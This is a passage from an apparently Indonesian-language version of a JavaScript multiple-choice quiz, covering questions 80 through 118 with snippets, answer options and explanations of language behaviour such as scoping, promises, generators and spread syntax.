`0` `1` `2` `3` get logged. With a _for-of_ loop, we can iterate over **iterables**. An array is an iterable. When we iterate over the array, the variable "item" is equal to the element it's currently iterating over, `"☕"` `"💻"` `"🍷"` `"🍫"` get logged. </p> </details> --- ###### 80. Apa yang akan tampil? ```javascript const list = [1 + 2, 1 * 2, 1 / 2]; console.log(list); ``` - A: `["1 + 2", "1 * 2", "1 / 2"]` - B: `["12", 2, 0.5]` - C: `[3, 2, 0.5]` - D: `[1, 1, 1]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Elemen array dapat berisi beberapa nilai. angka, string, objek, array lain, null, nilai boolean, undefined, dan lainnya seperti tanggal, fungsi, dan kalkulasi. elemen akan sama dengan nilai hasilnya. `1 + 2` menghasilkan `3`, `1 * 2` menghasilkan `2`, dan `1 / 2` menghasilkan `0.5`. </p> </details> --- ###### 81. Apa yang akan tampil? ```javascript function sayHi(name) { return `Hi there, ${name}`; } console.log(sayHi()); ``` - A: `Hi there,` - B: `Hi there, undefined` - C: `Hi there, null` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Secara default, arguments memiliki nilai `undefined`, kecuali nilai telah diisi ke fungsi. Pada kasus ini, kita tidak mengisi nilai untuk argument `name`. `name` sama dengan `undefined` yang mana mendapat catatan. Di ES6, kita dapat menulis ulang nilai default `undefined` dengan parameter default. Sebagai contoh: `function sayHi(name = "Lydia") { ... }` Pada kasus ini, juka kita tidak mengisi nilai atau mengisi `undefined`, `name` akan selalu sama dengan string `Lydia` </p> </details> --- ###### 82. What is the output? ```javascript var status = '😎'; setTimeout(() => { const status = '😍'; const data = { status: '🥑', getStatus() { return this.status; }, }; console.log(data.getStatus()); console.log(data.getStatus.call(this)); }, 0); ``` - A: `"🥑"` and `"😍"` - B: `"🥑"` and `"😎"` - C: `"😍"` and `"😎"` - D: `"😎"` and `"😎"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B The value of the `this` keyword is dependent on where you use it. In a **method**, like the `getStatus` method, the `this` keyword refers to _the object that the method belongs to_. The method belongs to the `data` object, so `this` refers to the `data` object. When we log `this.status`, the `status` property on the `data` object gets logged, which is `"🥑"`. With the `call` method, we can change the object to which the `this` keyword refers. In **functions**, the `this` keyword refers to the _the object that the function belongs to_. We declared the `setTimeout` function on the _global object_, so within the `setTimeout` function, the `this` keyword refers to the _global object_. On the global object, there is a variable called _status_ with the value of `"😎"`. When logging `this.status`, `"😎"` gets logged. </p> </details> --- ###### 83. What is the output? ```javascript const person = { name: 'Lydia', age: 21, }; let city = person.city; city = 'Amsterdam'; console.log(person); ``` - A: `{ name: "Lydia", age: 21 }` - B: `{ name: "Lydia", age: 21, city: "Amsterdam" }` - C: `{ name: "Lydia", age: 21, city: undefined }` - D: `"Amsterdam"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A We set the variable `city` equal to the value of the property called `city` on the `person` object. There is no property on this object called `city`, so the variable `city` has the value of `undefined`. Note that we are _not_ referencing the `person` object itself! We simply set the variable `city` equal to the current value of the `city` property on the `person` object. Then, we set `city` equal to the string `"Amsterdam"`. This doesn't change the person object: there is no reference to that object. When logging the `person` object, the unmodified object gets returned. </p> </details> --- ###### 84. What is the output? ```javascript function checkAge(age) { if (age < 18) { const message = "Sorry, you're too young."; } else { const message = "Yay! You're old enough!"; } return message; } console.log(checkAge(21)); ``` - A: `"Sorry, you're too young."` - B: `"Yay! You're old enough!"` - C: `ReferenceError` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Variables with the `const` and `let` keyword are _block-scoped_. A block is anything between curly brackets (`{ }`). In this case, the curly brackets of the if/else statements. You cannot reference a variable outside of the block it's declared in, a ReferenceError gets thrown. </p> </details> --- ###### 85. What kind of information would get logged? ```javascript fetch('https://www.website.com/api/user/1') .then(res => res.json()) .then(res => console.log(res)) ``` - A: The result of the `fetch` method. - B: The result of the second invocation of the `fetch` method. - C: The result of the callback in the previous `.then()`. - D: It would always be undefined. <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The value of `res` in the second `.then` is equal to the returned value of the previous `.then`. You can keep chaining `.then`s like this, where the value is passed to the next handler. </p> </details> --- ###### 86. Which option is a way to set `hasName` equal to `true`, provided you cannot pass `true` as an argument? ```javascript function getName(name) { const hasName = // } ``` - A: `!!name` - B: `name` - C: `new Boolean(name)` - D: `name.length` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A With `!!name`, we determine whether the value of `name` is truthy or falsy. If name is truthy, which we want to test for, `!name` returns `false`. `!false` (which is what `!!name` practically is) returns `true`. By setting `hasName` equal to `name`, you set `hasName` equal to whatever value you passed to the `getName` function, not the boolean value `true`. `new Boolean(true)` returns an object wrapper, not the boolean value itself. `name.length` returns the length of the passed argument, not whether it's `true`. </p> </details> --- ###### 87. Apa yang akan tampil? ```javascript console.log('I want pizza'[0]); ``` - A: `"""` - B: `"I"` - C: `SyntaxError` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B In order to get an character on a specific index in a string, you can use bracket notation. The first character in the string has index 0, and so on. In this case we want to get the element which index is 0, the character `"I'`, which gets logged. Note that this method is not supported in IE7 and below. In that case, use `.charAt()` </p> </details> --- ###### 88. Apa yang akan tampil? ```javascript function sum(num1, num2 = num1) { console.log(num1 + num2); } sum(10); ``` - A: `NaN` - B: `20` - C: `ReferenceError` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B You can set a default parameter's value equal to another parameter of the function, as long as they've been defined _before_ the default parameter. We pass the value `10` to the `sum` function. If the `sum` function only receives 1 argument, it means that the value for `num2` is not passed, and the value of `num1` is equal to the passed value `10` in this case. The default value of `num2` is the value of `num1`, which is `10`. `num1 + num2` returns `20`. If you're trying to set a default parameter's value equal to a parameter which is defined _after_ (to the right), the parameter's value hasn't been initialized yet, which will throw an error. </p> </details> --- ###### 89. Apa yang akan tampil? ```javascript // module.js export default () => 'Hello world'; export const name = 'Lydia'; // index.js import * as data from './module'; console.log(data); ``` - A: `{ default: function default(), name: "Lydia" }` - B: `{ default: function default() }` - C: `{ default: "Hello world", name: "Lydia" }` - D: Global object of `module.js` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A With the `import * as name` syntax, we import _all exports_ from the `module.js` file into the `index.js` file as a new object called `data` is created. In the `module.js` file, there are two exports: the default export, and a named export. The default export is a function which returns the string `"Hello World"`, and the named export is a variable called `name` which has the value of the string `"Lydia"`. The `data` object has a `default` property for the default export, other properties have the names of the named exports and their corresponding values. </p> </details> --- ###### 90. Apa yang akan tampil? ```javascript class Person { constructor(name) { this.name = name; } } const member = new Person('John'); console.log(typeof member); ``` - A: `"class"` - B: `"function"` - C: `"object"` - D: `"string"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Classes are syntactical sugar for function constructors. The equivalent of the `Person` class as a function constructor would be: ```javascript function Person() { this.name = name; } ``` Calling a function constructor with `new` results in the creation of an instance of `Person`, `typeof` keyword returns `"object"` for an instance. `typeof member` returns `"object"`. </p> </details> --- ###### 91. Apa yang akan tampil? ```javascript let newList = [1, 2, 3].push(4); console.log(newList.push(5)); ``` - A: `[1, 2, 3, 4, 5]` - B: `[1, 2, 3, 5]` - C: `[1, 2, 3, 4]` - D: `Error` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D The `.push` method returns the _new length_ of the array, not the array itself! By setting `newList` equal to `[1, 2, 3].push(4)`, we set `newList` equal to the new length of the array: `4`. Then, we try to use the `.push` method on `newList`. Since `newList` is the numerical value `4`, we cannot use the `.push` method: a TypeError is thrown. </p> </details> --- ###### 92. Apa yang akan tampil? ```javascript function giveLydiaPizza() { return 'Here is pizza!'; } const giveLydiaChocolate = () => "Here's chocolate... now go hit the gym already."; console.log(giveLydiaPizza.prototype); console.log(giveLydiaChocolate.prototype); ``` - A: `{ constructor: ...}` `{ constructor: ...}` - B: `{}` `{ constructor: ...}` - C: `{ constructor: ...}` `{}` - D: `{ constructor: ...}` `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Regular functions, such as the `giveLydiaPizza` function, have a `prototype` property, which is an object (prototype object) with a `constructor` property. Arrow functions however, such as the `giveLydiaChocolate` function, do not have this `prototype` property. `undefined` gets returned when trying to access the `prototype` property using `giveLydiaChocolate.prototype`. </p> </details> --- ###### 93. Apa yang akan tampil? ```javascript const person = { name: 'Lydia', age: 21, }; for (const [x, y] of Object.entries(person)) { console.log(x, y); } ``` - A: `name` `Lydia` and `age` `21` - B: `["name", "Lydia"]` and `["age", 21]` - C: `["name", "age"]` and `undefined` - D: `Error` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A `Object.entries(person)` returns an array of nested arrays, containing the keys and objects: `[ [ 'name', 'Lydia' ], [ 'age', 21 ] ]` Using the `for-of` loop, we can iterate over each element in the array, the subarrays in this case. We can destructure the subarrays instantly in the for-of loop, using `const [x, y]`. `x` is equal to the first element in the subarray, `y` is equal to the second element in the subarray. The first subarray is `[ "name", "Lydia" ]`, with `x` equal to `"name"`, and `y` equal to `"Lydia"`, which get logged. The second subarray is `[ "age", 21 ]`, with `x` equal to `"age"`, and `y` equal to `21`, which get logged. </p> </details> --- ###### 94. Apa yang akan tampil? ```javascript function getItems(fruitList, ...args, favoriteFruit) { return [...fruitList, ...args, favoriteFruit] } getItems(["banana", "apple"], "pear", "orange") ``` - A: `["banana", "apple", "pear", "orange"]` - B: `[["banana", "apple"], "pear", "orange"]` - C: `["banana", "apple", ["pear"], "orange"]` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D `...args` is a rest parameter. The rest parameter's value is an array containing all remaining arguments, **and can only be the last parameter**! In this example, the rest parameter was the second parameter. This is not possible, and will throw a syntax error. ```javascript function getItems(fruitList, favoriteFruit, ...args) { return [...fruitList, ...args, favoriteFruit]; } getItems(['banana', 'apple'], 'pear', 'orange'); ``` The above example works. This returns the array `[ 'banana', 'apple', 'orange', 'pear' ]` </p> </details> --- ###### 95. Apa yang akan tampil? ```javascript function nums(a, b) { if (a > b) console.log('a is bigger'); else console.log('b is bigger'); return; a + b; } console.log(nums(4, 2)); console.log(nums(1, 2)); ``` - A: `a is bigger`, `6` and `b is bigger`, `3` - B: `a is bigger`, `undefined` and `b is bigger`, `undefined` - C: `undefined` and `undefined` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B In JavaScript, we don't _have_ to write the semicolon (`;`) explicitly, however the JavaScript engine still adds them after statements. This is called **Automatic Semicolon Insertion**. A statement can for example be variables, or keywords like `throw`, `return`, `break`, etc. Here, we wrote a `return` statement, and another value `a + b` on a _new line_. However, since it's a new line, the engine doesn't know that it's actually the value that we wanted to return. Instead, it automatically added a semicolon after `return`. You could see this as: ```javascript return; a + b; ``` This means that `a + b` is never reached, since a function stops running after the `return` keyword. If no value gets returned, like here, the function returns `undefined`. Note that there is no automatic insertion after `if/else` statements! </p> </details> --- ###### 96. Apa yang akan tampil? ```javascript class Person { constructor() { this.name = 'Lydia'; } } Person = class AnotherPerson { constructor() { this.name = 'Sarah'; } }; const member = new Person(); console.log(member.name); ``` - A: `"Lydia"` - B: `"Sarah"` - C: `Error: cannot redeclare Person` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Kita dapat mengatur kelas yang sama dengan kelas / fungsi konstruktor lainnya. Dalam kasus ini, kita mengatur `Person` sama dengan `AnotherPerson`. Nama pada konstruktor ini adalah `Sarah`, jadi nama properti yang baru pada `Person` instance `member` adalah `"Sarah"`. </p> </details> --- ###### 97. Apa yang akan tampil? ```javascript const info = { [Symbol('a')]: 'b', }; console.log(info); console.log(Object.keys(info)); ``` - A: `{Symbol('a'): 'b'}` and `["{Symbol('a')"]` - B: `{}` and `[]` - C: `{ a: "b" }` and `["a"]` - D: `{Symbol('a'): 'b'}` and `[]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Simbol bukanlah merupakan suatu _enumerable_. Metode Object.keys akan mengembalikan semua properti kunci _enumerable_ pada sebuah objek. Simbol tidak akan terlihat, dan array kosong dikembalikan. Saat mencatat seluruh objek, semua properti akan terlihat, bahkan yang bukan non-enumerable. Ini adalah salah satu dari banyak kualitas simbol: Disamping selain mewakili nilai yang sepenuhnya unik (yang mencegah terjadinya benturan nama yang tidak disengaja pada objek, misalnya saat bekerja dengan 2 library yang ingin menambahkan properti ke objek yang sama), anda juga dapat "menyembunyikan" properti pada objek dengan cara ini (meskipun tidak seluruhnya. Anda masih dapat mengakses simbol menggunakan metode `Object.getOwnPropertySymbols()`). </p> </details> --- ###### 98. Apa yang akan tampil? ```javascript const getList = ([x, ...y]) => [x, y] const getUser = user => { name: user.name, age: user.age } const list = [1, 2, 3, 4] const user = { name: "Lydia", age: 21 } console.log(getList(list)) console.log(getUser(user)) ``` - A: `[1, [2, 3, 4]]` and `undefined` - B: `[1, [2, 3, 4]]` and `{ name: "Lydia", age: 21 }` - C: `[1, 2, 3, 4]` and `{ name: "Lydia", age: 21 }` - D: `Error` and `{ name: "Lydia", age: 21 }` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Fungsi `getList` menerima array sebagai argumennya. Di antara tanda kurung pada fungsi `getList`, Kita akan menstruktur ulang. Anda dapat melihat ini sebagai: `[x, ...y] = [1, 2, 3, 4]` Dengan parameter sisa `...y`, kita akan meletakkan semua argumen "yang tersisa" dalam array. Dalam kasus ini argumen yang tersisa adalah `2`, `3` dan `4`. Nilai dari `y` merupakan suatu array, yang berisi semua parameter lainnya. Pada kasus ini nilai dari `x` sama dengan `1`, jadi saat kita mencatat `[x, y]`, maka catatannya `[1, [2, 3, 4]]`. Fungsi `getUser` menerima sebuah objek. Dengan fungsi tanda panah, kita tidak _perlu_ menulis tanda kurung kurawal jika hanya mengembalikan satu nilai. Namun, jika anda mengembalikan nilai _object_ dari fungsi tanda panah, Anda harus menuliskannya di antara tanda kurung, jika tidak maka tidak ada nilai yang dikembalikan! Fungsi berikut akan mengembalikan sebuah objek: `const getUser = user => ({ name: user.name, age: user.age })` Karena tidak ada nilai yang dikembalikan dalam kasus ini, maka fungsi akan mengembalikan `undefined`. </p> </details> --- ###### 99. Apa yang akan tampil? ```javascript const name = 'Lydia'; console.log(name()); ``` - A: `SyntaxError` - B: `ReferenceError` - C: `TypeError` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Variabel `name` menyimpan nilai string, yang bukan merupakan suatu fungsi, sehingga tidak dapat dipanggil. TypeErrors dilemparkan ketika nilai yang didapatkan bukan dari jenis yang kita harapkan. JavaScript mengharapkan `name` menjadi sebuah fungsi karena kita mencoba untuk memanggilnya. Namun itu adalah sebuah string, sehingga akan muncul TypeError gets thrown: name is not a function! SyntaxErrors muncul ketika anda salah menulis suatu Javascript, seperti `return` menjadi `retrun`. ReferenceErrors muncul ketika JavaScript tidak dapat menemukan nilai referensi ke nilai yang anda coba akses. </p> </details> --- ###### 100. What's the value of output? ```javascript // 🎉✨ This is my 100th question! ✨🎉 const output = `${[] && 'Im'}possible! You should${'' && `n't`} see a therapist after so much JavaScript lol`; ``` - A: `possible! You should see a therapist after so much JavaScript lol` - B: `Impossible! You should see a therapist after so much JavaScript lol` - C: `possible! You shouldn't see a therapist after so much JavaScript lol` - D: `Impossible! You shouldn't see a therapist after so much JavaScript lol` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B `[]` is a truthy value. With the `&&` operator, the right-hand value will be returned if the left-hand value is a truthy value. In this case, the left-hand value `[]` is a truthy value, so `"Im'` gets returned. `""` is a falsy value. If the left-hand value is falsy, nothing gets returned. `n't` doesn't get returned. </p> </details> --- ###### 101. What's the value of output? ```javascript const one = false || {} || null; const two = null || false || ''; const three = [] || 0 || true; console.log(one, two, three); ``` - A: `false` `null` `[]` - B: `null` `""` `true` - C: `{}` `""` `[]` - D: `null` `null` `true` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With the `||` operator, we can return the first truthy operand. If all values are falsy, the last operand gets returned. `(false || {} || null)`: the empty object `{}` is a truthy value. This is the first (and only) truthy value, which gets returned. `one` is equal to `{}`. `(null || false || "")`: all operands are falsy values. This means that the past operand, `""` gets returned. `two` is equal to `""`. `([] || 0 || "")`: the empty array`[]` is a truthy value. This is the first truthy value, which gets returned. `three` is equal to `[]`. </p> </details> --- ###### 102. What's the value of output? ```javascript const myPromise = () => Promise.resolve('I have resolved!'); function firstFunction() { myPromise().then(res => console.log(res)); console.log('second'); } async function secondFunction() { console.log(await myPromise()); console.log('second'); } firstFunction(); secondFunction(); ``` - A: `I have resolved!`, `second` and `I have resolved!`, `second` - B: `second`, `I have resolved!` and `second`, `I have resolved!` - C: `I have resolved!`, `second` and `second`, `I have resolved!` - D: `second`, `I have resolved!` and `I have resolved!`, `second` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D With a promise, we basically say _I want to execute this function, but I'll put it aside for now while it's running since this might take a while. Only when a certain value is resolved (or rejected), and when the call stack is empty, I want to use this value._ We can get this value with both `.then` and the `await` keyword in an `async` function. Although we can get a promise's value with both `.then` and `await`, they work a bit differently. In the `firstFunction`, we (sort of) put the myPromise function aside while it was running, but continued running the other code, which is `console.log('second')` in this case. Then, the function resolved with the string `I have resolved`, which then got logged after it saw that the callstack was empty. With the await keyword in `secondFunction`, we literally pause the execution of an async function until the value has been resolved befoer moving to the next line. This means that it waited for the `myPromise` to resolve with the value `I have resolved`, and only once that happened, we moved to the next line: `second` got logged. </p> </details> --- ###### 103. What's the value of output? ```javascript const set = new Set(); set.add(1); set.add('Lydia'); set.add({ name: 'Lydia' }); for (let item of set) { console.log(item + 2); } ``` - A: `3`, `NaN`, `NaN` - B: `3`, `7`, `NaN` - C: `3`, `Lydia2`, `[object Object]2` - D: `"12"`, `Lydia2`, `[object Object]2` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The `+` operator is not only used for adding numerical values, but we can also use it to concatenate strings. Whenever the JavaScript engine sees that one or more values are not a number, it coerces the number into a string. The first one is `1`, which is a numerical value. `1 + 2` returns the number 3. However, the second one is a string `"Lydia"`. `"Lydia"` is a string and `2` is a number: `2` gets coerced into a string. `"Lydia"` and `"2"` get concatenated, which results in the string `"Lydia2"`. `{ name: "Lydia" }` is an object. Neither a number nor an object is a string, so it stringifies both. Whenever we stringify a regular object, it becomes `"[object Object]"`. `"[object Object]"` concatenated with `"2"` becomes `"[object Object]2"`. </p> </details> --- ###### 104. What's its value? ```javascript Promise.resolve(5); ``` - A: `5` - B: `Promise {<pending>: 5}` - C: `Promise {<fulfilled>: 5}` - D: `Error` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C We can pass any type of value we want to `Promise.resolve`, either a promise or a non-promise. The method itself returns a promise with the resolved value (`<fulfilled>`). If you pass a regular function, it'll be a resolved promise with a regular value. If you pass a promise, it'll be a resolved promise with the resolved value of that passed promise. In this case, we just passed the numerical value `5`. It returns a resolved promise with the value `5`. </p> </details> --- ###### 105. What's its value? ```javascript function compareMembers(person1, person2 = person) { if (person1 !== person2) { console.log('Not the same!'); } else { console.log('They are the same!'); } } const person = { name: 'Lydia' }; compareMembers(person); ``` - A: `Not the same!` - B: `They are the same!` - C: `ReferenceError` - D: `SyntaxError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Objects are passed by reference. When we check objects for strict equality (`===`), we're comparing their references. We set the default value for `person2` equal to the `person` object, and passed the `person` object as the value for `person1`. This means that both values have a reference to the same spot in memory, thus they are equal. The code block in the `else` statement gets run, and `They are the same!` gets logged. </p> </details> --- ###### 106. What's its value? ```javascript const colorConfig = { red: true, blue: false, green: true, black: true, yellow: false, }; const colors = ['pink', 'red', 'blue']; console.log(colorConfig.colors[1]); ``` - A: `true` - B: `false` - C: `undefined` - D: `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D In JavaScript, we have two ways to access properties on an object: bracket notation, or dot notation. In this example, we use dot notation (`colorConfig.colors`) instead of bracket notation (`colorConfig["colors"]`). With dot notation, JavaScript tries to find the property on the object with that exact name. In this example, JavaScript tries to find a property called `colors` on the `colorConfig` object. There is no proprety called `colors`, so this returns `undefined`. Then, we try to access the value of the first element by using `[1]`. We cannot do this on a value that's `undefined`, so it throws a `TypeError`: `Cannot read property '1' of undefined`. JavaScript interprets (or unboxes) statements. When we use bracket notation, it sees the first opening bracket `[` and keeps going until it finds the closing bracket `]`. Only then, it will evaluate the statement. If we would've used `colorConfig[colors[1]]`, it would have returned the value of the `red` property on the `colorConfig` object. </p> </details> --- ###### 107. Apakah hasil nilai dibawah ini ? ```javascript console.log('❤️' === '❤️'); ``` - A: `true` - B: `false` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Di belakang layar, emoji adalah sebuah unicode. Unicode untuk emoji hati adalah `"U+2764 U+FE0F"`. Keduanya akan selalu sama untuk emoji yang sama, jadi sebetulnya kita telah membandingkan dua string yang sama satu sama lain, yang mana akan menghasilkan true. </p> </details> --- ###### 108. Manakah metode berikut yang akan memodifikasi array aslinya? ```javascript const emojis = ["✨", "🥑", "😍"]; emojis.map((x) => x + "✨"); emojis.filter((x) => x !== "🥑"); emojis.find((x) => x !== "🥑"); emojis.reduce((acc, cur) => acc + "✨"); emojis.slice(1, 2, "✨"); emojis.splice(1, 2, "✨"); ``` - A: `All of them` - B: `map` `reduce` `slice` `splice` - C: `map` `slice` `splice` - D: `splice` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Metode `splice`, akan memodifikasi array aslinya dengan cara menghapus, mengganti atau menambahkan elemen. Dalam kasus ini, kami menghapus 2 item dari indeks 1 (kami menghapus `'🥑'` dan`' 😍'`) dan menambahkan emoji ✨ sebagai penggantinya. `map`,` filter` dan `slice` akan mengembalikan array baru,` find` akan mengembalikan elemen yang dicari, dan `reduce` akan mengembalikan nilai yang telah dikurangi. </p> </details> --- ###### <a name=20191009></a>109. Apa yang akan tampil? ```javascript const food = ['🍕', '🍫', '🥑', '🍔']; const info = { favoriteFood: food[0] }; info.favoriteFood = '🍝'; console.log(food); ``` - A: `['🍕', '🍫', '🥑', '🍔']` - B: `['🍝', '🍫', '🥑', '🍔']` - C: `['🍝', '🍕', '🍫', '🥑', '🍔']` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A We set the value of the `favoriteFood` property on the `info` object equal to the string with the pizza emoji, `'🍕'`. A string is a primitive data type. In JavaScript, primitive data types act by reference In JavaScript, primitive data types (everything that's not an object) interact by _value_. In this case, we set the value of the `favoriteFood` property on the `info` object equal to the value of the first element in the `food` array, the string with the pizza emoji in this case (`'🍕'`). A string is a primitive data type, and interact by value (see my [blogpost](https://www.theavocoder.com/complete-javascript/2018/12/21/by-value-vs-by-reference) if you're interested in learning more) Then, we change the value of the `favoriteFood` property on the `info` object. The `food` array hasn't changed, since the value of `favoriteFood` was merely a _copy_ of the value of the first element in the array, and doesn't have a reference to the same spot in memory as the element on `food[0]`. When we log food, it's still the original array, `['🍕', '🍫', '🥑', '🍔']`. </p> </details> --- ###### 110. What does this method do? ```javascript JSON.parse(); ``` - A: Parses JSON to a JavaScript value - B: Parses a JavaScript object to JSON - C: Parses any JavaScript value to JSON - D: Parses JSON to a JavaScript object only <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A With the `JSON.parse()` method, we can parse JSON string to a JavaScript value. ```javascript // Stringifying a number into valid JSON, then parsing the JSON string to a JavaScript value: const jsonNumber = JSON.stringify(4); // '4' JSON.parse(jsonNumber); // 4 // Stringifying an array value into valid JSON, then parsing the JSON string to a JavaScript value: const jsonArray = JSON.stringify([1, 2, 3]); // '[1, 2, 3]' JSON.parse(jsonArray); // [1, 2, 3] // Stringifying an object into valid JSON, then parsing the JSON string to a JavaScript value: const jsonArray = JSON.stringify({ name: 'Lydia' }); // '{"name":"Lydia"}' JSON.parse(jsonArray); // { name: 'Lydia' } ``` </p> </details> --- ###### 111. Apa yang akan tampil? ```javascript let name = 'Lydia'; function getName() { console.log(name); let name = 'Sarah'; } getName(); ``` - A: Lydia - B: Sarah - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D Each function has its own _execution context_ (or _scope_). The `getName` function first looks within its own context (scope) to see if it contains the variable `name` we're trying to access. In this case, the `getName` function contains its own `name` variable: we declare the variable `name` with the `let` keyword, and with the value of `'Sarah'`. Variables with the `let` keyword (and `const`) are hoisted, but unlike `var`, don't get <i>initialized</i>. They are not accessible before the line we declare (initialize) them. This is called the "temporal dead zone". When we try to access the variables before they are declared, JavaScript throws a `ReferenceError`. If we wouldn't have declared the `name` variable within the `getName` function, the javascript engine would've looked down the _scope chain_. The outer scope has a variable called `name` with the value of `Lydia`. In that case, it would've logged `Lydia`. ```javascript let name = 'Lydia'; function getName() { console.log(name); } getName(); // Lydia ``` </p> </details> --- ###### 112. Apa yang akan tampil? ```javascript function* generatorOne() { yield ['a', 'b', 'c']; } function* generatorTwo() { yield* ['a', 'b', 'c']; } const one = generatorOne(); const two = generatorTwo(); console.log(one.next().value); console.log(two.next().value); ``` - A: `a` and `a` - B: `a` and `undefined` - C: `['a', 'b', 'c']` and `a` - D: `a` and `['a', 'b', 'c']` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With the `yield` keyword, we `yield` values in a generator function. With the `yield*` keyword, we can yield values from another generator function, or iterable object (for example an array). In `generatorOne`, we yield the entire array `['a', 'b', 'c']` using the `yield` keyword. The value of `value` property on the object returned by the `next` method on `one` (`one.next().value`) is equal to the entire array `['a', 'b', 'c']`. ```javascript console.log(one.next().value); // ['a', 'b', 'c'] console.log(one.next().value); // undefined ``` In `generatorTwo`, we use the `yield*` keyword. This means that the first yielded value of `two`, is equal to the first yielded value in the iterator. The iterator is the array `['a', 'b', 'c']`. The first yielded value is `a`, so the first time we call `two.next().value`, `a` is returned. ```javascript console.log(two.next().value); // 'a' console.log(two.next().value); // 'b' console.log(two.next().value); // 'c' console.log(two.next().value); // undefined ``` </p> </details> --- ###### 113. Apa yang akan tampil? ```javascript console.log(`${(x => x)('I love')} to program`); ``` - A: `I love to program` - B: `undefined to program` - C: `${(x => x)('I love') to program` - D: `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Expressions within template literals are evaluated first. This means that the string will contain the returned value of the expression, the immediately invoked function `(x => x)('I love')` in this case. We pass the value `'I love'` as an argument to the `x => x` arrow function. `x` is equal to `'I love'`, which gets returned. This results in `I love to program`. </p> </details> --- ###### 114. What will happen? ```javascript let config = { alert: setInterval(() => { console.log('Alert!'); }, 1000), }; config = null; ``` - A: The `setInterval` callback won't be invoked - B: The `setInterval` callback gets invoked once - C: The `setInterval` callback will still be called every second - D: We never invoked `config.alert()`, config is `null` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Normally when we set objects equal to `null`, those objects get _garbage collected_ as there is no reference anymore to that object. However, since the callback function within `setInterval` is an arrow function (thus bound to the `config` object), the callback function still holds a reference to the `config` object. As long as there is a reference, the object won't get garbage collected. Since it's not garbage collected, the `setInterval` callback function will still get invoked every 1000ms (1s). </p> </details> --- ###### 115. Which method(s) will return the value `'Hello world!'`? ```javascript const myMap = new Map(); const myFunc = () => 'greeting'; myMap.set(myFunc, 'Hello world!'); //1 myMap.get('greeting'); //2 myMap.get(myFunc); //3 myMap.get(() => 'greeting'); ``` - A: 1 - B: 2 - C: 2 and 3 - D: All of them <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B When adding a key/value pair using the `set` method, the key will be the value of the first argument passed to the `set` function, and the value will be the second argument passed to the `set` function. The key is the _function_ `() => 'greeting'` in this case, and the value `'Hello world'`. `myMap` is now `{ () => 'greeting' => 'Hello world!' }`. 1 is wrong, since the key is not `'greeting'` but `() => 'greeting'`. 3 is wrong, since we're creating a new function by passing it as a parameter to the `get` method. Object interact by _reference_. Functions are objects, which is why two functions are never strictly equal, even if they are identical: they have a reference to a different spot in memory. </p> </details> --- ###### 116. Apa yang akan tampil? ```javascript const person = { name: 'Lydia', age: 21, }; const changeAge = (x = { ...person }) => (x.age += 1); const changeAgeAndName = (x = { ...person }) => { x.age += 1; x.name = 'Sarah'; }; changeAge(person); changeAgeAndName(); console.log(person); ``` - A: `{name: "Sarah", age: 22}` - B: `{name: "Sarah", age: 23}` - C: `{name: "Lydia", age: 22}` - D: `{name: "Lydia", age: 23}` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Both the `changeAge` and `changeAgeAndName` functions have a default parameter, namely a _newly_ created object `{ ...person }`. This object has copies of all the key/values in the `person` object. First, we invoke the `changeAge` function and pass the `person` object as its argument. This function increases the value of the `age` property by 1. `person` is now `{ name: "Lydia", age: 22 }`. Then, we invoke the `changeAgeAndName` function, however we don't pass a parameter. Instead, the value of `x` is equal to a _new_ object: `{ ...person }`. Since it's a new object, it doesn't affect the values of the properties on the `person` object. `person` is still equal to `{ name: "Lydia", age: 22 }`. </p> </details> --- ###### 117. Which of the following options will return `6`? ```javascript function sumValues(x, y, z) { return x + y + z; } ``` - A: `sumValues([...1, 2, 3])` - B: `sumValues([...[1, 2, 3]])` - C: `sumValues(...[1, 2, 3])` - D: `sumValues([1, 2, 3])` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With the spread operator `...`, we can _spread_ iterables to individual elements. The `sumValues` function receives three arguments: `x`, `y` and `z`. `...[1, 2, 3]` will result in `1, 2, 3`, which we pass to the `sumValues` function. </p> </details> --- ###### 118. Apa yang akan tampil? ```javascript let num = 1; const list = ['🥳', '🤠', '🥰', '🤪']; console.log(list[(num += 1)]); ``` - A: `🤠` - B: `🥰` - C: `SyntaxError` - D: `ReferenceError` 